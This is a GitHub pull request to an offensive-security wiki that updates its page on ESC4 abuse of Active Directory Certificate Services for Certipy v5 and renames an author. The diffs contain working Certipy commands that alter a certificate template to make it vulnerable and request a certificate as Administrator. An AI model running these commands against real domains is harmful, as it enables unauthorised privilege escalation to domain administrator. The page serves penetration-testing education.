### PR TITLE
Updated ESC4 abuse commands after Certipy v5 update

### DIFF
--- a/docs/src/ad/movement/adcs/access-controls.md
+++ b/docs/src/ad/movement/adcs/access-controls.md
@@ -66,7 +66,7 @@ From UNIX-like systems, [Certipy](https://github.com/ly4k/Certipy) (Python) can 
 # 1. Save the old configuration, edit the template and make it vulnerable
 certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -write-default-configuration
 
-# Warning: running the coommand twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.
+# Warning: running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.
 
 # 2. Request a template certificate with a custom SAN
 certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca "$CA_NAME" -template "$ESC4_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
@@ -101,7 +101,7 @@ modifyCertTemplate.py -template templateName -value "'1.3.6.1.5.5.7.3.2', '1.3.6
 # 1. Save the old configuration, edit the template and make it vulnerable
 certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -save-old
 
-# Warning: running the coommand twice will override the backup file, make sure to keep a seconde backup of the old configuration somwhere.
+# Warning: running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.
 
 # 2. Request a template certificate with a custom SAN
 certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca "$CA_NAME" -template "$ESC4_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"

--- a/docs/src/ad/movement/adcs/access-controls.md
+++ b/docs/src/ad/movement/adcs/access-controls.md
@@ -59,7 +59,6 @@ From UNIX-like systems, [Certipy](https://github.com/ly4k/Certipy) (Python) can 
 
 > [!WARNING] Certipy v5
 > Certipy introduced new behavior and flags in version 5.0. Some commands were renamed or replaced, and automatic backup of the template configuration is now performed.
-> If you're using older versions, switch to **UNIX-like (legacy Certipy)**.
 
 > [!WARNING] Template backup
 > Running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.

--- a/docs/src/ad/movement/adcs/access-controls.md
+++ b/docs/src/ad/movement/adcs/access-controls.md
@@ -57,16 +57,16 @@ In order to obtain an abusable template, some attributes and parameters need to 
 
 From UNIX-like systems, [Certipy](https://github.com/ly4k/Certipy) (Python) can be used to enumerate these sensitive access control entries ([how to enumerate](./#attack-paths)), and to overwrite the template in order to add the SAN attribute and make it vulnerable to ESC1. It also had the capacity to save the old configuration in order to restore it after the attack.
 
-> [!WARNING] WARNING
-> **Major change with Certipy v5.0+**
+> [!WARNING] Certipy v5
 > Certipy introduced new behavior and flags in version 5.0. Some commands were renamed or replaced, and automatic backup of the template configuration is now performed.
 > If you're using older versions, switch to **UNIX-like (legacy Certipy)**.
+
+> [!WARNING] Template backup
+> Running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.
 
 ```bash
 # 1. Save the old configuration, edit the template and make it vulnerable
 certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -write-default-configuration
-
-# Warning: running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.
 
 # 2. Request a template certificate with a custom SAN
 certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca "$CA_NAME" -template "$ESC4_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
@@ -92,23 +92,7 @@ modifyCertTemplate.py -template templateName -value "'1.3.6.1.5.5.7.3.2', '1.3.6
 ```
 
 > [!TIP]
->
 > By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.
-
-=== UNIX-like (legacy Certipy)
-
-```bash
-# 1. Save the old configuration, edit the template and make it vulnerable
-certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -save-old
-
-# Warning: running the command twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.
-
-# 2. Request a template certificate with a custom SAN
-certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca "$CA_NAME" -template "$ESC4_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
-
-# 3. After the attack, restore the original configuration
-certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -configuration "$ESC4_TEMPLATE_NAME.json"
-```
 
 === Windows
 

--- a/docs/src/ad/movement/adcs/access-controls.md
+++ b/docs/src/ad/movement/adcs/access-controls.md
@@ -1,5 +1,5 @@
 ---
-authors: Croumi, ShutdownRepo, lap1nou, sckdev, BlWasp
+authors: Croumi, ShutdownRepo, lap1nou, sckdev, BlWasp, NevaSec
 category: ad
 ---
 
@@ -57,17 +57,22 @@ In order to obtain an abusable template, some attributes and parameters need to 
 
 From UNIX-like systems, [Certipy](https://github.com/ly4k/Certipy) (Python) can be used to enumerate these sensitive access control entries ([how to enumerate](./#attack-paths)), and to overwrite the template in order to add the SAN attribute and make it vulnerable to ESC1. It also had the capacity to save the old configuration in order to restore it after the attack.
 
+> [!WARNING] WARNING
+> **Major change with Certipy v5.0+**
+> Certipy introduced new behavior and flags in version 5.0. Some commands were renamed or replaced, and automatic backup of the template configuration is now performed.
+> If you're using older versions, switch to **UNIX-like (legacy Certipy)**.
+
 ```bash
 # 1. Save the old configuration, edit the template and make it vulnerable
-certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template templateName -save-old
+certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -write-default-configuration
 
-# Warning: running the coommand twice will override the backup file, make sure to keep a seconde backup of the old configuration somwhere.
+# Warning: running the coommand twice will override the backup file, make sure to keep a second backup of the old configuration somewhere.
 
 # 2. Request a template certificate with a custom SAN
-certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'
+certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca "$CA_NAME" -template "$ESC4_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
 
 # 3. After the attack, restore the original configuration
-certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template templateName -configuration 'templateName.json'
+certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -write-configuration "$ESC4_TEMPLATE_NAME.json" -no-save
 ```
 
 If a more precise template modification is needed, [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) (Python) can be used to modify each attributes of the template.
@@ -90,7 +95,20 @@ modifyCertTemplate.py -template templateName -value "'1.3.6.1.5.5.7.3.2', '1.3.6
 >
 > By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.
 
+=== UNIX-like (legacy Certipy)
 
+```bash
+# 1. Save the old configuration, edit the template and make it vulnerable
+certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -save-old
+
+# Warning: running the coommand twice will override the backup file, make sure to keep a seconde backup of the old configuration somwhere.
+
+# 2. Request a template certificate with a custom SAN
+certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca "$CA_NAME" -template "$ESC4_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
+
+# 3. After the attack, restore the original configuration
+certipy template -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -template "$ESC4_TEMPLATE_NAME" -configuration "$ESC4_TEMPLATE_NAME.json"
+```
 
 === Windows
 

--- a/docs/src/ad/persistence/dsrm.md
+++ b/docs/src/ad/persistence/dsrm.md
@@ -1,5 +1,5 @@
 ---
-authors: WodenSec
+authors: NevaSec
 category: ad
 ---
 

--- a/docs/src/contributing/write.md
+++ b/docs/src/contributing/write.md
@@ -1,5 +1,5 @@
 ---
-authors: AzeTIIx, ShutdownRepo, WodenSec
+authors: AzeTIIx, ShutdownRepo, NevaSec
 category: contributing
 ---
 


### PR DESCRIPTION
### **User description**
I changed the commands for the ESC4 abuse with certipy since the backup behavior changed and many flags as well. I also improved some elements such as variables in the commands.

I kept the legacy version in a separate "UNIX-like" tab, I hope this is a good solution.

I also changed my username in articles I created / contributed to because I changed my GitHub username.


___

### **PR Type**
Documentation


___

### **Description**
- Updated ESC4 abuse commands for Certipy v5 compatibility

- Added legacy Certipy commands in separate tab

- Improved command variables and documentation clarity

- Changed author attribution from WodenSec to NevaSec


___

### **Changes diagram**

```mermaid
flowchart LR
  A["Certipy v5 Update"] --> B["Updated ESC4 Commands"]
  B --> C["Legacy Commands Tab"]
  D["Author Change"] --> E["WodenSec to NevaSec"]
```


___



### **Changes walkthrough** 📝
<table><thead><tr><th></th><th align="left">Relevant files</th></tr></thead><tbody><tr><td><strong>Documentation</strong></td><td><table>
<tr>
  <td>
    <details>
      <summary><strong>access-controls.md</strong><dd><code>ESC4 commands update for Certipy v5</code>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </dd></summary>
<hr>

docs/src/ad/movement/adcs/access-controls.md

<li>Updated ESC4 abuse commands for Certipy v5 compatibility<br> <li> Added warning about major changes in Certipy v5.0+<br> <li> Created legacy Certipy commands section for older versions<br> <li> Improved command variables and fixed typos<br> <li> Added NevaSec to authors list


</details>


  </td>
  <td><a href="https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/pull/188/files#diff-067168ccc667c87b973ec04f4589195c4a62261a9d66a813a63cd87dd3f54ee4">+24/-6</a>&nbsp; &nbsp; </td>

</tr>

<tr>
  <td>
    <details>
      <summary><strong>dsrm.md</strong><dd><code>Author attribution update</code>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </dd></summary>
<hr>

docs/src/ad/persistence/dsrm.md

- Changed author from WodenSec to NevaSec


</details>


  </td>
  <td><a href="https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/pull/188/files#diff-441a67a107655027b347e75870be7b8a40b55c87ba82085f544b6580f955ca29">+2/-2</a>&nbsp; &nbsp; &nbsp; </td>

</tr>

<tr>
  <td>
    <details>
      <summary><strong>write.md</strong><dd><code>Author attribution update</code>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </dd></summary>
<hr>

docs/src/contributing/write.md

- Changed author from WodenSec to NevaSec


</details>


  </td>
  <td><a href="https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/pull/188/files#diff-379134572da4aca12aa39f22ef5abc37811a118545605651a90b0cc101f39f9d">+1/-1</a>&nbsp; &nbsp; &nbsp; </td>

</tr>
</table></td></tr></tr></tbody></table>

___

> <details> <summary>  Need help?</summary><li>Type <code>/help how to ...</code> in the comments thread for any questions about Qodo Merge usage.</li><li>Check out the <a href="https://qodo-merge-docs.qodo.ai/usage-guide/">documentation</a> for more information.</li></details>